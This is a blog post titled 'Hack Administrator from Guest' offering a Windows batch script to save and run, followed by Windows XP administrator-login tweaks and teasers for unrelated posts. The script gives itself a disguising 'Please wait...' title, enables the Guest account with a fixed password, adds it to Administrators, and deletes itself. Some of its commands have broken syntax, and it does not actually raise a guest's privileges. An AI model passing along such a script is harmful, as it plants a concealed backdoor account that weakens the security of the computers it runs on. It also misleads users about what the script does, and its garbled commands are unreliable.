Skip to main content

Hack Administrator from Guest

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.

ADMINISTRATOR IN WELCOME SCREEN.
When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.

First you must ensure that the Administrator Account is enabled:

1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator

account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.

1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.


EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!

Start the Registry Editor Go to:

HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.

Comments

raghu

super

Popular posts from this blog

Xiaomi Stock Rom for all models

Download Xiaomi Stock Rom for all models Xiaomi Mi 1 / 1S Stock Rom Xiaomi Mi 2 / 2S Stock Rom Xiaomi Mi 2A Stock Rom Xiaomi Mi 3 Stock Rom Xiaomi Mi 4 Stock Rom Xiaomi Mi 4i Stock Rom Xiaomi Mi Note Stock Rom Xiaomi Mi Note Pro Stock Rom Xiaomi Mi Pad Stock Rom Xiaomi Redmi 1 Stock Rom Xiaomi Redmi 1S Stock Rom Xiaomi Redmi 2 Stock Rom Xiaomi Redmi Note Stock ROM Download 😯😯😯

How to Upload MP3 Files to Flickr or Picasa Albums

While most people use Flickr for uploading photos and videos, one can also use photo sharing websites like Picasa or Flickr for hosting MP3 songs and other audio files. For instance, these Flickr pictures are identical but the one on right is actually an MP3 file. To hide an MP3 file into a JPEG image, copy the MP3 file and a picture into a folder. Open the command prompt window (Start > Run > cmd) and switch to this folder. Now run the following command: copy /b my_picture.jpg + my_song.mp3 my_new_picture.jpg Remember to replace my_picture and my_song with relevant file names. Next, upload the my_new_picture.jpg file to Flickr. The MP3 song picture will look just like any other regular photograph that you share on Flickr. When you want to download that MP3 file from Flickr, open the relevant photo page, go to “All Sizes” and download the original sized image (example). Change the file extension to MP3 and enjoy the music using Winamp. And not just MP3 files, you...

Increase Android Device Speed by Disabling Animation

Animation can actually make your device feel good but in long term if you see these animations conserve battery and even make your phone a little slower, if you are running a high end phone then these little difference won’t be noticeable but its there and on lower end phones you are going to face a lot of issues, so today I will show you how to disable the animations in android and make your device faster. Disabling Animation Scale in Android to Make it Faster Basically there are 3 types of animation scale options you can disable in android that’s is Window Animation Scale, Transition Animation Scale and Animator Duration Scale. So lets see how to disable all three and make your android pumped up. 1. On Android, Open the About Menu. 2. Now scroll down and press 3 times on Build Number to enable he Developer Options. 3. Now you will get those Developer Options. 4. Just open that and scroll that, until you find three options: Window Animation Scale , Transition Animati...